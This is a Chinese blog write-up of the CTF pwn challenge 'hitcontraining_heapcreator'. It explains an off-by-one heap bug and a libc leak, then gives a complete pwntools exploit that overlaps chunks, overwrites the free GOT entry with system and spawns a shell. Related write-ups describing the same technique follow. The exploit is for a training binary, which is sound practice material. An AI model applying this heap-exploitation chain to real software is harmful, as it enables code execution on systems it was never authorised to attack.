hitcontraining_heapcreator 3/100

已于 2022-02-23 20:11:59 修改
阅读量108 收藏
点赞数 1
分类专栏: PWN 文章标签: 安全 pwn
于 2022-02-23 19:31:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/123097429
版权

漏洞点:

edit_chunk :off by one 一个字节的溢出
free_chunk: 逻辑漏洞,可以泄露libc

思路:

利用逻辑漏洞泄露libc
利用off by one 实现chunk extend
构造堆块重叠
实现任意地址写

exp:

from pwn import *
p = process("./heapcreator")
e = ELF("./heapcreator")
libc = e.libc
p.timeout = 0.1
def add(size,content):
	p.recvuntil("Your choice :")
	p.sendline("1")
	p.recvuntil("Size of Heap : ")
	p.send(str(size))
	p.recvuntil("Content of heap:")
	p.send(content)

def edit(index,content):
	p.recvuntil("Your choice :")
	p.sendline("2")
	p.recvuntil("Index :")
	p.sendline(str(index))
	p.recvuntil("Content of heap:")
	p.send(content)
	p.recvuntil("Done !\n")

def show(index):
	p.recvuntil("Your choice :")
	p.sendline("3")
	p.recvuntil("Index :")
	p.sendline(str(index))	

def delete(index):
	p.recvuntil("Your choice :")
	p.sendline("4")
	p.recvuntil("Index :")
	p.sendline(str(index))

add(0x18,'/bin/sh\x00')#0
add(0x80,'cccc')#1
add(0x18,'dddd')#2
delete(1)
delete(2)
add(0x80,'a'*(8))
show(1)
main_arena_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
libc_base= main_arena_addr-0x3c4b78
success("libc_base:"+hex(libc_base))
system = libc_base + libc.sym["system"]
add(0x18,'aaaa')
delete(1)
edit(2,"a"*(24)+"\xb1")
add(0xa8,"a")
edit(1,"a"*(0x80)+p64(0x90)+p64(0x20)+p64(0xa0)+p64(0x602018))
edit(1,p64(system))
delete(0)
p.interactive()

以上是我自己的打法,不过后来看别人的wp,发现我是个fw!
直接chunk_extend 覆盖后面的chunk 就可以任意地址写了。

cut_maize
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-3
weixin_44145820的博客
03-31 847
目录hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
HITCON Trainging lab13——heapcreator
04-19 247
64位程序,没开PIE   #chunkoverlapping #off by one 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char *v3; // rsi 4 const char *v4; // rdi 5 char...
C语言栈溢出 重定向返回地址 执行shellcode学习
顺炸天
12-31 573
REF: https://www.youtube.com/watch?v=1S0aBV-Waeo- 栈结构 https://dl.packetstormsecurity.net/papers/attack/64bit-overflow.pdf- 64位linux 动手实现buffer overflow http://www.cppblog.com/baby-fly/archive/2010/07/27/121395.html- gdb debug 实验环境 Linux kali(201...
hitcontraining_heapcreator
m0sway的博客
01-07 2867
hitcontraining_heapcreator 使用checksec查看: 开启了Canary和栈不可执行,没有开启PIE。 先运行一下看看: 看到菜单,堆题,放进IDA中查看: 分布来查看,首先是create_heap(): heaparray[i] = malloc(0x10uLL):创建用户所需chunk前程序会先创建一个0x10大小的chunk v0[1] = malloc(size);:程序所创建的chunk中存放了用户所创的chunk的地址 edit_heap(): rea
BUUCTF--hitcontraining_heapcreator1
qq_30528603的博客
01-05 413
此时往chunk3这个用户堆写数据,将会写入free_got表里,这样我们可以将伪造的system的地址写入free_got表,一旦调用free,将会去执行system。2.接着修改chunk0的内容填入bin/sh作为后续system的参数,利用off-by-one并修改下一个索引chunk的大小为0x81(覆盖的是chunk1的索引堆)。这句其实可以这样解读read(0,对应索引堆里的那个堆地址,Size),现在他将变成这样read(0,&free_got,Size)。以此来达到我们的目的。
[BUUCTF]-PWN:hitcontraining_heapcreator解析(off by one)
2301_79326813的博客
01-17 593
又是一道堆题,先看一下保护Partial RELRO说明got表可被修改,而且还没开pie,直接看ida这里就不过多解释了,把比较重要的说一下。首先是这个edit,它限制了填充字节,只能比我们申请的大小多1个字节。还有创建堆块的函数,他在创建我们申请的堆块前还申请了一个大小为0x10的堆块。在动态调试中可以发现,这个堆块还存储了与填充字节数有关的字节数,而且还和heaparray一样存储了指向与他一同创建的堆块的指针。
buuctf (pwnable_start)(babyfengshui_33c3_2016)(gyctf_2020_borrowstack)(ciscn_2019)(hitcontraining_h)
cainiao78777的博客
05-17 153
可以通过先申请几个小堆块chunnk0,1,2,3,再利用off by one漏洞用0修改1的大小,把2和一造成重叠,然后再申请回来,通过1把2的存储堆块指针的地方修改为free的got表地址,这样就能dump出来泄露libc,然后计算system,再修改free的got为system函数地址,然后free3就能getshell了。存储字符的时候,三个4字节大小的部分分别是printf的地址(相当于dump)free堆块的操作地址,存储字符的堆块的地址。
[off by one] hitcontraining_heapcreator
huzai9527的博客
04-01 355
[off by one] hitcontraining_heapcreator 本题主要看懂,edit中的off by one, 知道off by one 还需要知道程序的大概结构体 从内存情况推测结构体 每次申请空间,会创建2个chunk,其中一个固定为下面结构体形式,另一个根据大小分配 struct test{ int size; char *content; } exp from pwn import * #p = remote('node3.buuoj.cn',27554) p
buuctf hitcontraining_heapcreator HITCON Trainging lab13
weixin_45677731的博客
08-10 1014
这一题在wiki上面是有的,在Chunk Extend and Overlapping里面,个人觉得这一题对于我这种刚开始学习堆的人来说,是比较容易理解的一题 拖进IDA create_heap函数: 值得注意的是,他这里是会有两次malloc的,也就是说,你申请了一次,他就会创建两个chunk,第一个chunk是0x20大小的,可以看作是记录的作用,里面存放着第二个chunk的size和指针,同时,第一个chunk的地址指针保存在bss段中,heaparray数组这里: 这样表述起来可能不太清晰,我申
HITCON-Training lab13 heapcreatorheap extend)
像初雪一样自由洒落
04-16 1010
啊啊啊,搞了一早上,终于终于搞明白了,,, 题目链接:https://buuoj.cn/challenges#hitcontraining_heapcreator ida简单看一下 创建堆 编辑 对比建堆,可以看到size大了一个 打印 删除 程序基本功能就这样了 因为edit的时候可以多写入一个字节,存在off-by-one,我们可...
buuoj Pwn writeup 71-75
yongbaoii的博客
02-23 295
71 hitcontraining_heapcreator 保护 菜单 create edit show delete 72 [V&N2020 公开赛]babybabypwn 保护 这一堆东西,加了沙箱。 程序也是稀奇古怪。 先给了puts的地址。 syscall参数是15的话时调用的sigreturn。 平常我们是先调用signal,再调用sigreturn。 但是这个里面我们是直接调用的sigreturn,所以会把buf里面的东西返回成寄存器的状态。 因为禁用了execve,所以我们
粉尘传感器助力面粉厂安全生产
iotsensor的博客
07-19 594
OPC-R2有16个大小的垃圾箱,可以每秒记录PM1、PM2.5和PM10以及大小直方图,这在应用程序需要的不仅仅是PM时至关重要。OPC-R2取代了OPC-R1,带来了比其前身更好的小颗粒检测、更低的风扇噪声和更好的EMC保护。因此,如何有效监测和控制面粉厂的粉尘浓度,成为了保障安全生产的关键。这种传感器能够实时、准确地监测空气中的粉尘浓度,并将数据反馈给控制系统,从而实现对粉尘浓度的有效控制。通过实时监测和控制粉尘浓度,可以有效保障工作人员的健康、设备的安全运行以及环境的保护。
【ROS2】高级:安全-部署指南
最新发布
cxyhjl的博客
07-21 347
目标:了解将安全工件部署到生产系统时的最佳实践。教程级别:高级时间:20 分钟内容背景先决条件一般准则构建部署场景生成 Docker 镜像理解 compose 文件运行示例检查容器背景典型的部署场景通常涉及将容器化的应用程序或软件包发送到远程系统。在部署启用安全性的应用程序时应特别注意,要求用户考虑打包文件的敏感性。遵循 DDS 安全标准 https://www.omg.org/s...
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
Thewei666的博客
07-17 1210
区分不同的签名。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 487
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 618
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 798
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 1097
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
从人工巡检到智能防控:智慧油气田安全生产的新视角
TSINGSEE青犀视频官方技术博客
07-18 1068
远程视频监控:支持7/24小时实时高清视频监控,视频画面1、4、9、16个可选,支持自定义视频轮播。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值